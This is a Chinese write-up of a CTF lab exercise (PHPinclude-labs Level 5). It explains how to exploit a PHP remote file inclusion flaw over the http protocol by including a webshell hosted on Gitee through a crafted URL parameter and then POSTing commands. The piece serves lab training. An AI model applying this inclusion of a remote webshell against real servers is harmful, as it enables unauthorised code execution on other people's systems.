当前位置: 首页 > news >正文

[HelloCTF]PHPinclude-labs超详细WP-Level 5-http协议-2

news 2025/7/2 20:08:24

源码分析

  • 跟上一关一样, 没有任何变化

解题分析

  • 那变化在哪呢?

    • 其实变化在当前目录下的文件

    • 当前目录在不再有后门文件了

      • 不能再通过 127.0.0.1 和 靶机ip 来获取原本就存在的 WebShell

  • 所以需要自己在互联网上放一个 WebShell, 以便文件包含

    • 探姬贴心地已经在 Gitee 上准备好了 木马

    • https://gitee.com/Probius/PHPinclude-labs/raw/main/RFI

解题步骤

  • 使用远程文件包含, 包含上述地址, POST 传入对应参数即可

  • http://靶场ip?wrappers=gitee.com/Probius/PHPinclude-labs/raw/main/RFI

http://www.dtcms.com/a/75723.html

相关文章:

  • Mysql:关于命名
  • CPP从入门到入土之类和对象Ⅰ
  • LLM中lora的梯度更新策略公式解析
  • 数据恢复软件有哪些?评测哪款最好用
  • 「清华大学、北京大学」DeepSeek 课件PPT专栏
  • jmeter配件元素
  • 网络编程基础(2)
  • 导出的使用
  • YOLOv11小白的进击之路(九)创新YOLO11损失函数之NWD损失函数源码解读
  • 分布式锁的实现
  • 大数据处理最容易的开源平台
  • 【从零开始学习计算机科学】软件测试(五)白盒测试
  • [K!nd4SUS 2025] Crypto
  • 手写发布订阅模式
  • MySQL使用pxc实现高可用
  • 【软件系统架构】单体架构
  • 突破 HTML 学习瓶颈:表格、列表与表单的学习进度(一)
  • 【Opencv中的Jpeg有损压缩】
  • 功能强大的电脑硬件检测及驱动安装工具
  • 【计算机视觉】工业表计读数(3)--指针及刻度关键点识别
  • Spring Boot 事务详解
  • 滑动数组-定长滑动数组
  • SSH无法使用root用户进行登陆的解决方法
  • 【HarmonyOS Next】鸿蒙应用实现弹框DialogHub详解
  • Excel(函数进阶篇):Vlookup函数进阶、TAKE嵌套SORE函数、SUBTOTAL函数、INDIRECT函数
  • 华为全流程全要素研发项目管理(81页PPT)(文末有下载方式)
  • 蓝桥杯练习day1:拆分数位-四位数字的最小和
  • 【深度解析】48V转24V/5A宽压电源芯片:SOT23-5封装+外挂MOS管应用方案
  • rust学习笔记17-异常处理
  • 《心理学与生活》2025最新网课答案